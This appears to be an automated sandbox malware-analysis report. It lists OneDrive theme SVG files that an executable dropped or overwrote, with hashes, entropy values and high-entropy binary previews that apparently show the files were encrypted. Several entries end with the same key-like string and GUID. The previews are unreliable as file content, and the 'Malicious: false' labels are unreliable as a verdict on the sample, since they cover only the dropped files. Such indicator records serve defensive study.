SSDEEP:	192:Qc4l/TkU853+feukLQQiAWeTHJYPFKpOSbmQCb:MTB+3me3DiARKFAbcb
MD5:	7C7A436770933B754D6C3AEA929483AD
SHA1:	9214D922D3A6051328EEBA3AF0C773C82F8D7E9A
SHA-256:	C7E52B451772154CF4AC2E7DFC1A7F3CC59F37F7173648B1668ACB80AAED9982
SHA-512:	D128B46D80984AF41697F419E39B75864962D216F7A6D0777505A1DE5A3562DCF43403B1A3E1F4DD717DE7CDAF015DB77BFB9F29648A49923AB0C2162604D5CA
Malicious:	false
Reputation:	unknown
Preview:	<svg 87.R.......z...m.......\;............2..9,.P..p.S....G.N.. .....^.....N..J...;mvc=N..)k.f...f4.\|.T'.^.Y..z<......f.......\.X.......l.R......5.......a_i..g.o..+.{)FZrw.Y....U`.R.}5aa.hX.[..D.D...$y}...E..wmQ.......)....,.U\|...`...7.l..B.y..B.V..p.L...J..... QZ...}E.I.:U.n1.E1....'.d.:........2z.n7..r.^...z.......C..6.....:..(R6.>....KuW....b.@!]S....c...q..K...........4...dOy.].+..8...F..X.f.....(..........H.....R.7 ..Wm\......J6.............N"L?.R>...Y...$.Sf.O.....E...Do'J.u.;!.)2w........8.Kt..A(....T....#p.-..n...-.).>$....g.T(.......{14..d..\N.n.........b....E-M....F..~6T....V".o....fb....f.n..jI...3E....9..M..r.H.R..... ...1........+ey.L..>$.zL.....ryae..P.%..J.#`.F...0L.jK4.Gm....wN.......qR.....h..l..wIV...<.......$....s. .82D.......~..v......v.t...P.....'<.....S.`J" W]........5z.e>.Mz.P..0....y....Y..a.+..W..:-.?.f...4y...[-b.........E7...\.G.~...P..e.O....3.]..n.......Z.#.hF../..E......j..R._0.kD.......Bi...6

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\darkTheme\onDemandSelectiveSync.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	2978
Entropy (8bit):	7.933250979874733
Encrypted:	false
SSDEEP:	48:0QOBk1C6zfERBxU3jr7wFYud64IloI4+8eG6IsCZS7+os3GeV/pVUMTD:0LBk3zsCPwu06lE+8e2sCZS7+oS5nVV
MD5:	755ADC191F81A996CE0EDDDF30907D29
SHA1:	597BA5CD727B3AC104AF7855A16C9883B0FDDC38
SHA-256:	C6736C449D9C8E2339D18C0CAA6219520873D7A9DE88DFC5B8CC27C4C1A782B7
SHA-512:	5C4334AC57E09AAFBE965EE9C4191FADEF288271897F1E23ECEBAC58F6B5EF7DDB24108453EDCD5BE9E0B3F1FE6EFF33A707BD470AB2AEA05DE4B54784D632BE
Malicious:	false
Reputation:	unknown
Preview:	<svg /d...X.y.;.Q...Z......-.a...q...MH.<..v...U........8.ev.FvA.Eht....+...V.`R+.....v......L&J.iH.-...~]...H..A...O6u..&Wk.....<.E.......5.I.G...(.9.~..U$.Kh.X.4...g...C..J......E@.o..w......L\}...-[..9)}.......^.Y.~....4.y..U:ZUT@z....qV.....KTp..o...N..O]B..6<.Q..{_-o"#...=.<.v^.g&.5.X.a...[.......r.W....q.OQ%:..z6.....d.u..ey.F..G.o]U..e..l.=)t.#.fz..x..2./s8T.....=...]2H...?..Ze."............d....Ir.C.H....v...H...V.....:.....c1.y..N...c`I.}....hWnm.?.@.O..s~.'^6..........Vy.N..S..tw....B.K..J.....`....aY8..@?.^j..^e..\|S....S@..o..r...&7...1o..u..Kr~.....f!......EF..ytY3x.AF......'.L.t.I.:.>H ..&C.X....D.2".d>. ....B`...c"[r....{...SB.N3.9......'c..EFuB.r...a.9L9.1....5..w.}......b.a.)8..hfK.~.....d..h~.......... .ANx...in\|..c.j..R...8$....m.......[.2..rc..H.^.R....[..xo.b.c...Tl...3JRr.O....%.,U.......C.(P....$^.{~(x..... ........K7.5........2...#5..\E.}.P......R}....D.h...N.;........j...(..W..Z..Y...,}Z.L ....N...X<:..t_0.K...

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\darkTheme\overflowIcon.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	1306
Entropy (8bit):	7.826299095566288
Encrypted:	false
SSDEEP:	24:tGdxEYQzlA89T4u/uQgzCdiGiqs1k9VtOVYWcKgslKhDzQwxyUbD:MUz2E/OCdipqs1+tWFcKgslQDzQgLD
MD5:	B59A73DD3E4ACB21857ADF4EF404AEF5
SHA1:	5AC70836538EE8BF878D8D65BDB9EC4F230C873F
SHA-256:	B2D845F534D59CCB492C395A4DF60E60860E03D04A3EDE67D27E593F9B5D9BBC
SHA-512:	9B5360FAF510A8A0BDAD7C4CEE37BD7124FF509DAC1A16A0C6F18ECE2FEF3BE6482E89A545B486366D30AD0CA21FB8A668EA3D88395CEE4F2E383D9B5D76947F
Malicious:	false
Reputation:	unknown
Preview:	<svg F....e.p.......q8OQ>.@..url..<..Ek..9...<A..$...1oB.&...._....S....b?....PZ.....ab$..=..^M.....J.s..i.U>..#;.^.H.u.].~n.N....NY.I......#K...u].7...n....I..g.rk....b`./.O.....BW..%..s..&uq...V.l...9....R"..z..gP.>.>...\|.q.....u......#..A...Y-...x..!.;.$<?.u..j.\|....2..lg..GGq;.N.M..u.....#cP...F.J..5.../c.Q.9../..vv..g$en..........v.$W..;.-..J......iGt.n...J.~l...;@.....o/rT.. ..H...5.."q...] ..})T.UMy.,....4:.M_R......iI.H;.......lLF...)..W..H;.V.Y........a~~;.;.......j"...4.1P.9[0.1.....g.......)..1..d..`p.E.HP.9.=.~../...5.D.O.rvy8}.G.a.U.)._.."L..j^-.X.^2..O'...n..r.Ng..?Uq.1....wt..&o....'.D.........S...K...}i..^{...._..z..w..[&J.d......fH}..V...7....`h0..F.x..).,8G7.No.............;:dI...'.<...sp)...~3N.>n..I<.."-....#c3....Pi..&.'....z.@.~..Mq..HMt..0...]3.a[....x.]...cE.)_.D.:.. Zv.X.../.X..J..F9;...i..]..emC..1.f./<.....F..F._.=.q1.z.r......2........hA......M1.F.".......i..0,Y.^l..D.q<..d..L.._B....U.c..JE....2x.J2<a.".G....(

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\darkTheme\overflowIconLarge.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	1455
Entropy (8bit):	7.8576013896980506
Encrypted:	false
SSDEEP:	24:trnpU1lS+lJYhHa91CChmRJt3V4GVQ06bRqVtXPsHMj7nOBoTA05TqbD:tfMio7hmRj3mGVQ0YUJ/SoYD
MD5:	DCC3CD29F19FF1771F0437B9E443169D
SHA1:	4A4C15B9FC76387EF802F2E910065F5B94AB4836
SHA-256:	D6D3BFA46ACAF819CA6D6BE2DF3595E24A9073B201A52AC4C8E48365C0981852
SHA-512:	1F9A87105D338C02454EEAB799F616FBB21E23AA31FC0F37692AE48139483F5F0024C5830B73D29BDBE313A551C565654B59E962C1F7C3158B8C4DF67D00361A
Malicious:	false
Reputation:	unknown
Preview:	<svg ..>.;.W>.2:.Es....6..c..C.~..4?..gj....O...j.. ^.=U.^.8v..R:.w...Q.c.k..R...vo.%B...;......aW..@.?....B....q.:'&j...B...:~."...</+..3....K.\~'%e..MDQ`..xL...K.s..C.%Qy:y.S......:vI.."....}-\|/?..s..I...<$.u..6..v._./.L...Y.I=.99>.l....-.1)....w...........5Y.c!....+.....{E..J.6Vw.....\(4...Y..Z.".........\|L..I`.......s8/..@......).\|.z~...Z>~.a.f.Is...>...O.0[#..[....I......%8....5.o.?.....vK....(..d.R..T..w..p.n....g...r.8...{7.b..Wq.a...c,.f.A.5.....O>0...f..e.v...=..y:......&...sp.....).3./n.J.....W.\...././.......S.&X.Rd..L.\y(6.......t.^.].......l{z..Fky..p.h..:...s..RY=rax....K.F.\|./..{.......f.]C.......7.....y.......c.k..@..\|.l...J.v...p....3....UvHfB...M.....B.J-.8.I.....c.!...1.\|....a@..C..$.&.m.....!....D...eSn......%..`V$.#.[...H.:..y..7.M.#....Fp..<%.u..\Z..S.:".....`..lPp ..z.dLg.Y..W..LA..F.+...L.....:H..C..X.......{4u...dA?......-(....!u..w3...h:{=^..".v.z..{.c6.B..._..s.-8..Ct..].y......"..8...y.A.g.....w"..i3}n.<..

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\darkTheme\partiallyFreezing.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	4741
Entropy (8bit):	7.961533240639637
Encrypted:	false
SSDEEP:	96:YBq4CT663E9DRRxK/dLAzbGpfcIijVPJTSbjfkCAm0KW3TLeBNoAb:e+93ODVAdCq9YjXS0G0KoTLe7
MD5:	E3554133FCCFE35D243E422E9708B6FA
SHA1:	86A6696DA5F6545C701177795C581893C87963DB
SHA-256:	55FB8F6504E94EEDA79E8AD3830D814ADA81FDB24F701C6A7218FF56851EC50F
SHA-512:	53DE96AC4241460802ABACE02A88D358A034CC729104EAE019C7D11E63AD6169895AD99026D6901D833560AAD5BA49F026D818D19237AE64C3888E0229234162
Malicious:	false
Reputation:	unknown
Preview:	<svg ..........d.D..PeT...8.0...'..w.f/G.....W...4.".O ..L+...Ly.i..8dj.D\/.z.......a..I.j..F..s.G.Yc#...m.u. ../e.0.37W..(~X.1K..B7......1?d...j.3.Q.H.3.Y.,...:...8....[.l..y..r.m..W.n.h..5...-..P...e...\|...\|.E...D..k..\.3.b A....(..j...W..f.xs0.bd3...z........SC.M.b.N..N..({k...n>....bc.e.Z.?lW....&m...@.'.[..sP..L.x._.Kx.]..f..!..k=E.`Z...........f...@.;^C...r.9.....(.v....fW...U.. ......q.i....3G.w..'IK20\|...O....zt....k5g.$...5.....f.&h.....l1x..+..p...8....e..5Zg...8....>.T..X...&.,..3.....C..J9_=.jb...H.,.._...............pn.&....`.H.R......cY:..j._.1.....c?.....c)P.H..Df.11.Mo........q.;....\Tp9..Ao..gi....#.....%.I..K....s.).m....$..&g....c.7p.......Hbx......0.........G..9...D...y.y/C.....^......p1.".....\|.{...OY..(j!.....W..1...von.0.T].].......<k0.n.0e.1...b....... '>a;..T.y...1..V]./..=....Y....L~..<\&-..G.L..~..-..........F@....F.,:f.....Kr.TZ..i.am9.>[o....~d.K. \|...`..} .......=..$.........7l...Hf$..[.B..x.....y...T...T

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\darkTheme\paused.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	644
Entropy (8bit):	7.591257743902698
Encrypted:	false
SSDEEP:	12:t6nJhTUEk4QXjs9kZOxqctFh2CT8QfdnVEaPGuCkJp3x+cYtcii9a:t6nvTUEOs9xxvFh2kVhCMCIbobD
MD5:	EE5896975024AF43FBFD18E9A47BB620
SHA1:	C36325F5F2FDDAB6A27683D79C37AA050644199A
SHA-256:	C4A5276158D3353208046ABDF6C43E92BCC64FE7FFC179B94A3CE25B1190DEC5
SHA-512:	D854BEFFB533B105F15C69AC226454ECB13A86E030F16510880AF24A71A2A0A487AD02BDD827F1AAB000029C554EC5E99C2C471B06FA31FE5EA31A2059B55F09
Malicious:	false
Reputation:	unknown
Preview:	<svg . ..1..5m..tD6/j.'.l.CF..y.R..V....Mc...........#._'.~.B..]..0..tP.........S.H.J..e.79s...0H.].x..;F........:.F...pQ........e.+.....L...6.eej.A..c..X_]..n..MNl....c..r.B.p.8.;D)v...~..1#Q......{.X...m'........C..Q<...L.v.]L.i.X-.k....R.._...A....+.G.z..G...Hfs...4..S-_.UN...M.ie.}....q./...b7C.L..6x.>...F.d..G.d.yu,.....bD.j5../....q.\....H..B...S?7.@b..r.1rW........iG.+r..'......$t.B\5...Sr=..e..V.....^..[..L.3....I.,.u,.5HC.=:M......:.c..d..)..`...]9.....>1..+...{x<w.y.l.x&..j..:....<.C..p...&r.6."t.+...-...\|"..^p~..%^...v...tK6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\darkTheme\pc_alert.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	758
Entropy (8bit):	7.658921480304981
Encrypted:	false
SSDEEP:	12:qZgFNohGbO1ioMMNxyk8C3kS3+Z/dfcESm5t8e/6Hc/HL/RBDfGQUF7RZzvx9I0Y:qaNohGSUMNxykTUeXEV5t4cPLZBfQRhQ
MD5:	CD78A738507A2C83BAFB349273FCC324
SHA1:	1223CCAE8AF87D9D4880156B345C27B24B9D0325
SHA-256:	D094E6366FA573C5D3B74D9A89B4CBFC759EA12A0E13105C34604C11EB3A95D7
SHA-512:	25E6EDF9A4E7BC1AF5574D179F253EC606E01C9F2075FC450A108EAEA72FCBC2DCA0BD24A7FBF9594E9402C3F409C3D10A9C74EA3AC50691A7E761D964E66FEA
Malicious:	false
Reputation:	unknown
Preview:	<?xmlT... .z..`...=.w4.y..Ti.........5.....-p.7.....rgsf.u.:M.c....c.ax...../%..\|.r.BU [...=..p....H.2...Y.V.....w..D..Mv.q)..qA.;"..z..}.7.....x%E..s.j......FT...o..I...C....w..!.ih.....fA...6g.Up...A.rY....r..k..V.....C.Z..c.0JK....!#j.YL.r7CE.\|.........i....R.d.B.-+.......&.,cd...4.(..e...m.C..d...K.6.}..E.O.ev....7.H..h.Mh.K..Kl..}...(.4.6$..kp.K....4....8zl.;\,.0.y.CnM&+..C.oMPG.ZAd....0Z...d..3...}.......3[g.-..^IXy.....4.(A.:$.W#.....d.....C.}.W.......Q.......:?... . ..L.N..6.&I..8..#.$}5.lPTk......,.Ib..".oU.l.>.\|.s.i.......w..J]o.k3..e.2d.V..A.eRo...a%..p./...._....$..R..B...\I...3.2,(.`.A.._A=.&..R"..Q...tb..N....7v.j. .bX.g..RK6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\darkTheme\premiumIcon.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	711
Entropy (8bit):	7.65842433463064
Encrypted:	false
SSDEEP:	12:tc7CQevwRYsBCCWrkYqCHVu1H/ghR1TNHQQkk44j/ScuqN634lnqxecctcii9a:tuCrvwRYsBC/dfDBUP4h4YaibD
MD5:	7B6A495460D9FA624D468E10F9018196
SHA1:	EAB8C69984F86AB37D8C5302E61F09C5375CEFCE
SHA-256:	04B2BECD360F96B3338203AF9557497A0C13F145FD967E29A954456787FBAF6F
SHA-512:	BCC5E63AFBAB296D24E63ADF68623AC17EEC5B9A9060767EE329D915C023CED70BBF02B64F8196BCC070A0FA9E2C3C8613EE7DD55C6F6146875BF75A565DA4BA
Malicious:	false
Reputation:	unknown
Preview:	<svg ..<7...v....DV....7....2.D..1@...{..Q]j....>j..w\.M].......?...6.0;Brs.5Z...gV...(.@.+a1.J./..b.+M.g]K}.E.xqN.J....Ss..cFeX.E..}.[.]h..q6...K.^_..........m.Z....xm.zh.L.A....$1..1.Cn_...F:.'..?.K\|~...L.]E.}.....t.`...g.t.. .Ij.0..s.5S..Rr.5.n.._..)C<.j.YFo.L.w..1N ...o.3.'E.....Y.#.x..BuF..h4Du>.A.._.TQK.N.p!......5.....?...y.B1..3.qA......Kv.vVS...a=.....R..U9..y4(..,...D..9..{...,..<......N..A1.Mm....ZB..z.L....wD...\...!;...B....~......*...Z..C9..C.8.....?.z.X...A... .q....L0..}.nz.Po..[....).m.I..>.1.xoNJ...7.i....\....X....c....%P..'M#.A...4.#...T>....r...N>...x.S.k...r..~J...6</b.eo..KK6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\darkTheme\reSignIn.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	11234
Entropy (8bit):	7.983628057789993
Encrypted:	false
SSDEEP:	192:HaDVHn7jnv8wCA+QkwL2LiexN33loa7g4lu+q7UvtbUHYSF4rNDZXbg7/YMqw:6DVHnPn6D3i+Nn24lFqSsF4RDZCTP
MD5:	39353ADF7154B5EFF8F22FF99B47E2C3
SHA1:	7808C64DF8B3F0E1F0081410B21F931183B6BF08
SHA-256:	834487680426DAA49F6683C15708553BBE0CF42ACDDDC41C9C13DE7652AD0528
SHA-512:	56F4311C1F27727D10E7294035F1924051A1C0B8A584613699833DAE76BD267F2792CBE1746310E984C9E44430CC05DFD27D793B0735259526803ADDF1B139ED
Malicious:	false
Reputation:	unknown
Preview:	<svg ......>I...(:.6.Wg...)...@..Tj0T.........'N../.G.o.....7..YI..p...I.0.2V.L..GN..n.^5jN8...dx.......,..VeQ;[/..C.m....f.....K......e.......#..T......v.C.Ka.1.$.^....!.g.4......O.)j.".~e.0z.......t.....E..F.i.V^7-q..P,..B.....e..1s....v...U...6A..3..Dj3.]. B. >.y..g....:&...C..j..0..~....d...T\....Tsc..k.7=0N....E16)0.(.dQl.V].p..i)..E...:G.Ex..{.<I\.H'7z....h...D..i....F...K.72.....eB.6......&.....'.,.4..i..M.V-...f.v.7..(."..A6....\...BF:.0..........<...B6e...+....../h...#...L...o..Uet....{.;.....23.6....0m......W..JA...t..(G.QV.....g.h....0.R.=U.~..H...sT..~m.>.=,%..6*D....F...^.lA..l....rCa..j...2X...d^..G..e.XWG.!.....,M.R.34.....y}....M..k^e.m\ok..yY.p .O..k......:1....^...!...f.....................a..q,c.#7L... .(.#.8G....O..2.wZ.....vx.Y. E.yM.V.eD...3.X`.6.{..A[......w....'..v'......:G$^.w0.g..`D.q#.O.$...3..yf.....s...........[....A..@..L..)...!...'.....j'.`[.m.w..g".. .........?-%@;a.j.9.....w!~.b........jM....8.2

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\darkTheme\recycleBin.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	3780
Entropy (8bit):	7.948525652109291
Encrypted:	false
SSDEEP:	96:MWEkTEvlQYK4fJouEW8nj5vYv9m0k5BEfPnO:MOTEvlQ1CJouEcYPEPO
MD5:	45A526C138C1C6905B7BEDAEA7114F32
SHA1:	436762214CB5B8EEA2362DF3683DCD3D6A2AC6C6
SHA-256:	71B72513D295E783A8C518F9CDB824ADE78830A4301DF5CA5529858BDDAEDD86
SHA-512:	5EC53DD4A6801FE26FED8AD515865DE6022A8C477B52B3903B1B7291CA72880DFEED55B4323FF42E7E2C1FA7D8594E939C7C1DE600E36950B046F9B828911EA7
Malicious:	false
Reputation:	unknown
Preview:	<?xmle.;1...._.....9z&..d.YO....>.@9Q.z\..].?...K.(........U.......'.{.4.r...U.6k.S.g..l.......pl...o....X..........I.w..De....D......8].I...7^.c....WC...ia......y.....-\........w7..bP..l.i.-..A.....$...8..z.^.Re?/....SV'..]......gk.k...p.......\|.u6F."..^F.>....K.....bH............:UX.N...%.;.]....yI..p.#..$....jm]...Z...h.F1.....)..?.....9.p.J.w...>.y....]1..$.~.Ad7f...c_F .F.Gd=l.$=..2..Q...}D...U..\|.Et....7....<..%:..p}z.Kt....S..........K1"$.....pD.._..\|..t.uX., ..8}...K....).`.R.q).Gn5.+.U..!;.!...f.%.....!=...b.+!.ROs\|...h.I].blR.uF..+z..+'.\|....:...".W......ib\|...=....{....9\k.q....._&...Ws.QYT9.)Q.+.G.....,...\L.[J.>+.d..2[....@e.G...j.FoIO..!.}.,_..8..-..!.1<.IH..M.....{.Z..{.[...@.).B..j."..C6j.!.o..&.....~.l.\|..y...#.Z.t.Jr:Xm^.J....4Lf..q......c.n..K....W..F\|fi....Z.....%n"...1..]y..K....V..K....l..."....1kP0.....Y....;)..2...bA.9#{..Ih.....V`..rB......,.....(../M..I..2.F.\l=V............"a.I.7...=..CN...G.......Q...

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\darkTheme\shield_icon.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1549
Entropy (8bit):	7.865152900679877
Encrypted:	false
SSDEEP:	48:yS2zfvNoCXs3qs+Jha4fYszoH1h7yO1scwD:EO+FJADLOO1k
MD5:	51F223F65FEC7BE716B427912F6642DF
SHA1:	19AAC2B25C8D78CA8C68423D11AB08463D8DA634
SHA-256:	2274217BECA967F55E18D11DEC2E3F90F96C1AFBAC0A3BE7929487EC8D7FED8B
SHA-512:	B9C64257480D71E939073CE35EA560085FA4A6444AB8EB85BD86FCCFBC9EECB2A8C798D0A31F5DDEDEF5CA05FA49A1562BFA2FB8ABAD38BE08A1B4990E353821
Malicious:	false
Reputation:	unknown
Preview:	<?xml...Yf.RY....;...i;%.3.^\..o....hWG...2-...H..c....t<....HQ......8.#G....)7q..ac...M.\|(X..^..7.t......X.'......L#0...........;.....v.a...u..-...a....VO..4.....b.......M...C..l..i'.f_x\|...1....\..h$.r..:.dk.i....>..{.2....M9r8.....#..g!!....>.....9aGY.d..p:.i~[.{..a.t.4(.-".>..P.z...J....}DE.....9.&.c.q.(2.4...3.,.i.w.PQ..iT..).b.2..0..I.........)h..Q.^.X.fk....y>@ :~.X.\|.._..$v.Ir....u0.h...d"...z..j.z...c.c.... ......7...../...c1.-..e(ub0...)eL.<..\..x.Q.9.$...o....T<I..CZx.9K........&..vdo.E&.Acz.n..x..L...2q....L.1o...X.1......'1{j6?x.>.\|.......;..d.;.b'..1.K....b..wa...?V<.S..........O........e...7..fc....e..\..`..:...F...\~..E\+^.!.......8.j.....H..%..[.2ce(1.V.,..9..y&..........y.GZfJ...]........<=...%.5...k."..(..?._...eX.E.l>!..XH....um...N..P..f.q.C..w&...2..wI..!.{.X5...m..SK....HfFO...{..#.(.d..j):.<..J.]3...l.......6.L.K....h.$.J.....X..-...[....aS.....`_.....5y...Q.L....0....k..hU.8N..`.vt3{l...,P?....N..'p.nl`6C

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\darkTheme\signIn.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	11266
Entropy (8bit):	7.984644305239746
Encrypted:	false
SSDEEP:	192:x9fYtj9T7P5fZcrzYett+rP7j24ZtMWn1xwj1TmY2v8kDjQvNtbEZ+d:xY9T7PQrzYS+rPxrMWn1xeUY2v8kA1aq
MD5:	C0BF904AA33CACA630D866132CA019FE
SHA1:	22EA01FF5C086EFA41E05795236798E084ECC456
SHA-256:	1CFC46ED38C7A630D2F823B42D28A0C5E27A6826BBBB90CD9698E422C428C592
SHA-512:	2938CEEFC2D726BC69CCB65080C168D8FD1E642B0F394FAEFB5B94E7A1255E48A5379AAE3F7FEC3469AE8E93484678470515AC6A1881D758B4DEA136288F122A
Malicious:	false
Reputation:	unknown
Preview:	<svg ....oH..cs(....\\| =u._.e%5.....p.?....$ c@44.......U.H.$.gw0&.=.+kySJ.)'.'....Fyd...!..SI.'.7_..........!i..T..`%".....,.H.>y^...g.p.w-.........?Q....)......R..h.......1.52...&..R.._h.V.(095e.%.\|.Q.3i_.....K.g......SVP.{7u.....r..v..-:l{\......V.....l..a.......r!X.....a6V`}.....3....kr...vJ...r..3{....4...;.>!.w.!..H...?vo.oju?..,....c.?....Q....6(Q[.a. ..t^.h..?...`..z.'..8$.........Z.r...r.6...5.D4...c>z....l.....'zr.....&....[..{c.sgZ~..;`...0.:.'.!.m.`Kxe.....Gr\|..'smv.a.@...../.........tte...7..!a...6.C?1..........Qs...-...M.P ..Z.)>.;..C.......6..a.y;...Vh-HH...).-......L...e....\...............I...\|I.p.\.g...X........DP.[...\...t..9;....7...$6.....C!.{...Z.D>..x....tKN...Q....\...r..I..C..#....eg....H....].@.. ..'C.NM...^Fm.ZV9.5P..q.(..P,/.>D..N.......p.&.M0........`.,..>J..$kdD>#0.u..........^.OA.O...j.E..9.94.....WQ.r.q.......u.\.KV~s...>3.+K..<..c....R..2'.l.`8.3.qp...T..[.l....e7A6.S.$...8...[.?...F.0(....u.....

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\darkTheme\stackedIceCubes.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	5141
Entropy (8bit):	7.958761735100599
Encrypted:	false
SSDEEP:	96:d4FefElsKBB1bTdHuJyo9G9/HeIfZ6Y/ncIspDLdyHac1:TiT5Tdes9/+If8+9+LdyH
MD5:	3438D495F40B5B7BC799EF4CDC15E3EB
SHA1:	24F4A7968DFB90AF69CCD630526242BE9258FAE3
SHA-256:	CB53129E507E18ED0DB45873477099B551CE9B8CB1A129DC4C07A77036620272
SHA-512:	4E180327C3A821B0729B0E88BF3BAAE08DF3F16A094F6D8832F94705C62CCC0983570172CF3083CD6D17DD8EFDC07F04BC684CDE437FB22775AF107995A2DCD0
Malicious:	false
Reputation:	unknown
Preview:	<svg ..w6....!...^...)i.T1+..}.....FD"(L^.. G..HZg.ki.:P..NM......!.......6..y.{..p&..?.t...x..P#Hn..[..^/.....?$Z.o6..k.N.E.....qi\....S.....Y}e...{7y.....1n........b.b. q........f+..&...!TU...........".{4.>A.W...P.......u.".K..&X..(4.mEl..........0.W..P2G.N..j-).X...IF.-W<..3......j.=....H.6.....o..i!.."D.t.p.H..S..je.."ci.....+s.D<.c.\<?....@0.....w_(..........C.....Y..6.W/.=........jC./...>S.q.k..<.,x0......:y&@...B."..x2....\J}...]."y..h..l.b.0...j.'F.mLbm4...lV.."9...@.p.m...=2....O2Lb...e..1l./XE..G...Wf...H..E.K]..3.F..w.&..Tg..R...;Rb..W./NV...-c0.c.]J......./...j.....P..`........[.q.J.H....dI.....F........n.7..O...........@!f.....U...g.[..?...,"+....`.I.I#.s.......P..m........}Bhg.B...kj@cGnm...a..Wa.......#.:#....\|A........w.....y..'..$....X.C9..$....y`FU.Bu...o..E...U....yji....z`:.. Bh....M.........?C..v...5...7...O...ui..Up..+@......[..r]....}...........i>A.X..u0Q....tS!k.D.K.V(...6.,Q.G.,s...A.mb..}..TT*)...~.W..

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\darkTheme\vaultIntro.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	7497
Entropy (8bit):	7.974019702805168
Encrypted:	false
SSDEEP:	192:/JiEjo+2UtDhvJMZZVBUV/Z7HY46eHOMy9gdYvfUOBz8j2Thqh:xiIoEpJMnVBu/Z7HY/euMy9g/Szw2Tsh
MD5:	1C31A41D8C316970A74033F9F6A94389
SHA1:	E02A8591D462B74540C3059E25FD77DEE3F58B5D
SHA-256:	3947233CF0A56E445049EAAA933F8C11016664EB34FEE8FAF28D8942923F7FE6
SHA-512:	E675222EF9DB47E88125DEA278ED5040E0458D7F08890CE94C063D095D75B3C27A071C6152AD6CAFA476C3D3FBDF54FA8FD549E2E0CE74F152B283696A37DB02
Malicious:	false
Reputation:	unknown
Preview:	<svg .QX.....+......RJNl...=...PD..-..f....b..r...d.4.]$........55.FF...-`..g}.....%.J...<.._.....`l[:<.b..._A..\.\.......@....I5o.....>B...MZ..}.,V...Y....f......5.q....d?.g...Th....V>&...zq.E.M5....B.....bN..C^........3...#....{...#.=6..-+vx......K.W.J.d..7."+....XnK.A.....<T...Y..y.V...n.F.H..U.....ut..(.cS./O..N.V...vN3O.oH64.>...1s....n.Dg.Vy......o>f.7y.~.T.R...F"m-.E-Q2..6wZ/-It....5:.@.Xp.c-K...U......>f:%9j..<7.u.-..5.M..5..Y98...33..d...C.l8.../....#.<..$!F;..u.q....}/.w........H.%...bR.>....Z....!B....L.B...s.mT:.Ar.26...uWj.z>...3<..e..5...r.....AW..x...F..j[..o...g..`>..F..{oc.^.t.c....=j@+..7.U>.q.MX`u.b.^.>.S.C..........-....w.(..K.K.s,..t'5.s.m..{....rp..@....Qh\|....G.8.O..\|U:...F3IyA.....x..&.o....&...Z@..f.W..;{{.SF.....Fg..f.K....G7]O.....L............r..G..w.0...&.5..F.$.........u....7..>".......--.^..9....+........b...X.y.p$\|...o<..r3E.8:f...Q7.i..q......[..@W.!.Q..8.^.w...<.Y[...iF....e]x{..b...!).K...`.V.._..O

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\darkTheme\vaultUnlocked.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	7446
Entropy (8bit):	7.976485508289443
Encrypted:	false
SSDEEP:	192:ViJYZ6lTwYZwMDuG8zkwhIMz+KNRczZim:VJwTZquyIoZRuZim
MD5:	4BFF758B99F65BA23FEAEF077E793558
SHA1:	929A8803E4A8A8E8CC796D19CF0D269113334386
SHA-256:	41F64E3AA206C840A9E99B28936ED2B12BF77D78B5EDA1C9217C48072DE39B06
